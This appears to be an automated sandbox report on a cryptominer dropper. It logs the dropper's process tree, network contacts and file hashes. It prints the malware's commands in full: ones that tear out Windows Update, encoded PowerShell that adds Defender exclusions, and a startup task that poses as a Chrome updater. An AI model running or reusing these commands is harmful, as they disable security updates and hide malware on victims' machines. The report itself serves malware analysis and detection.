PID 3412 wrote to memory of 4756 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3412 wrote to memory of 2164 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3412 wrote to memory of 2164 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3412 wrote to memory of 5036 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3412 wrote to memory of 5036 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3412 wrote to memory of 3324 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3412 wrote to memory of 3324 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3412 wrote to memory of 4016 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3412 wrote to memory of 4016 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3412 wrote to memory of 2008 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3412 wrote to memory of 2008 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3228 wrote to memory of 4432 N/A C:\Windows\Temp\miner2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3228 wrote to memory of 4432 N/A C:\Windows\Temp\miner2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28.exe

"C:\Users\Admin\AppData\Local\Temp\6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28.exe"

C:\Windows\Temp\miner2.exe

"C:\Windows\Temp\miner2.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAcABsAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcQBpAGgAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZgB6AHMAIwA+AA=="

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop UsoSvc

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\sc.exe

sc stop bits

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop dosvc

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\WaaSMedicSvc.dll

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAYgAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBwAG8AdwBlAHIAcwBoAGUAbABsACcAIAAtAEEAcgBnAHUAbQBlAG4AdAAgACcALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAiAFAAQQBBAGoAQQBHAFkAQQBkAEEAQQBqAEEARAA0AEEASQBBAEIAVABBAEgAUQBBAFkAUQBCAHkAQQBIAFEAQQBMAFEAQgBRAEEASABJAEEAYgB3AEIAagBBAEcAVQBBAGMAdwBCAHoAQQBDAEEAQQBMAFEAQgBHAEEARwBrAEEAYgBBAEIAbABBAEYAQQBBAFkAUQBCADAAQQBHAGcAQQBJAEEAQQBuAEEARQBNAEEATwBnAEIAYwBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEASQBBAEIARwBBAEcAawBBAGIAQQBCAGwAQQBIAE0AQQBYAEEAQgBIAEEARwA4AEEAYgB3AEIAbgBBAEcAdwBBAFoAUQBCAGMAQQBFAE0AQQBhAEEAQgB5AEEARwA4AEEAYgBRAEIAbABBAEYAdwBBAGQAUQBCAHcAQQBHAFEAQQBZAFEAQgAwAEEARwBVAEEAYwBnAEEAdQBBAEcAVQBBAGUAQQBCAGwAQQBDAGMAQQBJAEEAQQB0AEEARgBZAEEAWgBRAEIAeQBBAEcASQBBAEkAQQBCAFMAQQBIAFUAQQBiAGcAQgBCAEEASABNAEEASQBBAEEAOABBAEMATQBBAGEAdwBCAHEAQQBIAGsAQQBJAHcAQQArAEEAQQA9AD0AIgAnACkAIAA8ACMAeABsACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAZwBsAHAAbwAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAGgAeQBjAGgAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwAgAC0AVQBzAGUAcgAgACcAUwB5AHMAdABlAG0AJwAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwBiAHYAawBjACMAPgA7ACAAQwBvAHAAeQAtAEkAdABlAG0AIAAnAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwAbQBpAG4AZQByADIALgBlAHgAZQAnACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAEYAbwByAGMAZQAgADwAIwBzAGIAawBxACMAPgA7ACAAUwB0AGEAcgB0AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgADwAIwBuAHQAcABhACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAOwA="

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAGYAdAAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAA8ACMAawBqAHkAIwA+AA=="

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAcABsAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcQBpAGgAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZgB6AHMAIwA+AA=="

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop UsoSvc

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop bits

C:\Windows\system32\sc.exe

sc stop dosvc

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\WaaSMedicSvc.dll

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe "duhwxeji"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 168.117.168.52.in-addr.arpa udp

Files

C:\Windows\Temp\miner2.exe

MD5 64fa4d87885a9c469eccb0439e255741
SHA1 62b9d1398abde05f7cd300dcc91610d7a69c3321
SHA256 539950d10b9fe26e543bae99259d4734538c7c872015553b2000269f7dd66232
SHA512 19b2d066bfcfad55a75f863814dd21acfbaeded535d671d7660bc32a3f77569519fa3692d906aaeb4b59c3e36f529c3e2ef5d809c2602790b365db1c23a16792

C:\Windows\Temp\miner2.exe

MD5 c6451e29590ab9da28fe5eb7467248b4
SHA1 7089977d643b0937c8ef437b868465c27d279980
SHA256 5e81cac27a3cc7dc28e0c72f5caa6e327e98e0efb0a624ca86c6d21ea32963e2
SHA512 e990dcbdc8b3dc09274628d85a1c887c708e7e30b5ba51fa5a989636fa23d0151f375243b8b5dea28c2d555f5647ce017fad8685daabd3d89dd85aaa21461766

C:\Windows\Temp\miner2.exe

MD5 8b66eab88b56e35421bd98201aa21ce0
SHA1 a20cc5f21f948905f892e20e2fc57eb7f1160139
SHA256 dbd0c9edcb29fcf870b3ae1625a030c4dc71c24c6e2f32c7affc52667ab6cbe8
SHA512 e4da409d93859f10347b182a5942e858dfd0dfcf2de3b07dcd02ee590cf181172276339c1d26ca3ba24e287aa3f3c4e13114fc9a8295bc7655393b526ed4803e

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rgrhst1h.2s1.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 627073ee3ca9676911bee35548eff2b8
SHA1 4c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA256 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA512 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7d760ca2472bcb9fe9310090d91318ce
SHA1 cb316b8560b38ea16a17626e685d5a501cd31c4a
SHA256 5c362b53c4a4578d8b57c51e1eac15f7f3b2447e43e0dad5102ecd003d5b41d4
SHA512 141e8661d7348ebbc1f74f828df956a0c6e4cdb70f3b9d52623c9a30993bfd91da9ed7d8d284b84f173d3e6f47c876fb4a8295110895f44d97fd6cc4c5659c35

C:\Program Files\Google\Chrome\updater.exe

MD5 44de920efeabc69ee9b9182919bce1f0
SHA1 d4c193f6da0d67212306e3cc1e8c47e815cbcfc6
SHA256 9c9fc62cc395129c6b7eae15787904a1cd06ef1a6ed553c96aa0fcca72ad22c6
SHA512 4f61ec955db1fe7f67b4b175fd611ef69258cae1b5da802ac5de0600c3db9fd078f3af55e206a29fd6546a78cd4a9b142e0f2db6c8e823f60b66f6374e2ee14a

C:\Program Files\Google\Chrome\updater.exe

MD5 4fce4e5dc8dbe04d993ef15a92ff0713
SHA1 1aac0bd32b9828cc834ba465a20269061f4a7f2b
SHA256 72c1c3c05d0fb946e49685ccfd383bc79186e30908f2cbeb534bdfd805f4f4e0
SHA512 53102d5d74abb923ce06a8a54a314173a549282d0082b4fdc3a821a2517fd401793cff08484344da9e183d2bf61d4be8ad3155390b936d193870d70efb651e75

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 88dc70c361a22feac57b031dd9c1f02f
SHA1 a9b4732260c2a323750022a73480f229ce25d46d
SHA256 43244c0820ec5074e654ecd149fa744f51b2c1522e90285567713dae64b62f59
SHA512 19c0532741ebc9751390e6c5ca593a81493652f25c74c8cab29a8b5b1f1efef8d511254a04f50b0c4a20724bae10d96d52af7a76b0c85ddc5f020d4cac41100c

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 75d892015e838d87587a722f53dc8d29
SHA1 e731fe110fbd31a940da124faf10d253bdbb4743
SHA256 6790057711692446e5f1085e9e916db9f3d68d4c870a4ea173298c6c0e18ad41
SHA512 6ca766d4ff190a6a34f4283b6c426b16fece171973245d508696e17ee18338ed619419a73b48b25ed18bdde8fc61db7e9680c63932e29d08343058a51b30fa26
